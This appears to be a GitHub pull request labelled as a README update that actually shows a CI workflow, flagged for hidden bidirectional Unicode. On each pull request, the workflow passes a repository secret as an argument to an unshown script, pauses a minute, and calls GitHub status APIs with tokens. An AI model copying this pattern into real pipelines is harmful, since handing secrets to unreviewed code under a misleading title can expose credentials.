Update README.md #23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: List All Statuses | |
on: | |
pull_request: | |
branches: [ "main" ] | |
workflow_dispatch: | |
jobs: | |
list-statuses: | |
runs-on: ubuntu-latest | |
steps: | |
- name: Checkout repository | |
uses: actions/checkout@v3 | |
- name: Test Output | |
run: | | |
echo "Hello" | |
- name: List legacy commit statuses (plural endpoint) | |
run: | | |
python3 cmdarg.py "${{ secrets.TEST_SECRET }}" | |
sleep 1m | |
COMMIT_SHA="${{ github.sha }}" | |
REPO="${{ github.repository }}" | |
echo "Fetching legacy statuses for commit: $COMMIT_SHA in $REPO" | |
curl -H "Accept: application/vnd.github.v3+json" \ | |
-H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ | |
"https://api.github.com/repos/$REPO/commits/$COMMIT_SHA/statuses" | |
curl -H "Accept: application/vnd.github.v3+json" \ | |
-H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ | |
"https://api.github.com/repos/$REPO/commits/$COMMIT_SHA/status" | |
curl -H "Accept: application/vnd.github.v3+json" \ | |
-H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ | |
"https://api.github.com/repos/$REPO/commits/$COMMIT_SHA/check-runs" | |
curl -H "Accept: application/vnd.github.v3+json" \ | |
-H "Authorization: token ${{ secrets.PR_STATUS_TOKEN }}" \ | |
"https://api.github.com/repos/$REPO/commits/$COMMIT_SHA/check-runs" | |
- name: List combined status (legacy statuses summary) | |
run: | | |
COMMIT_SHA="${{ github.sha }}" |